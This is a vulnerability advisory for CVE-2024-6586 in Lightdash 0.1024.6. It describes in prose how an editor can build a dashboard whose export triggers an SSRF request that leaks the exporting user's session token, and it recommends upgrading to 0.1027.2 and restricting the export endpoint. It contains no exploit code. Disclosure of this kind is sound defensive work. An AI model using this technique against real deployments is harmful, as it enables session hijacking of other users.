CVE-2024-6586

Name of the Vulnerable Software and Affected Versions Lightdash version 0.1024.6

Description The issue allows users with necessary permissions, such as Administrator or Editor, to create and share dashboards that can trigger an SSRF request when exported, via a POST request to "/api/v1/dashboards//export". This forged request contains the value of the exporting user’s session token, which can be used by a threat actor to obtain the session token of any user who exports the dashboard and perform actions as the victim on the application, resulting in session takeover.

Recommendations For Lightdash version 0.1024.6, update to version 0.1027.2 to protect the system. As a temporary workaround, consider restricting access to the "/api/v1/dashboards//export" endpoint until the update is applied. Additionally, users should be cautious when exporting dashboards that contain HTML elements which point to external sources.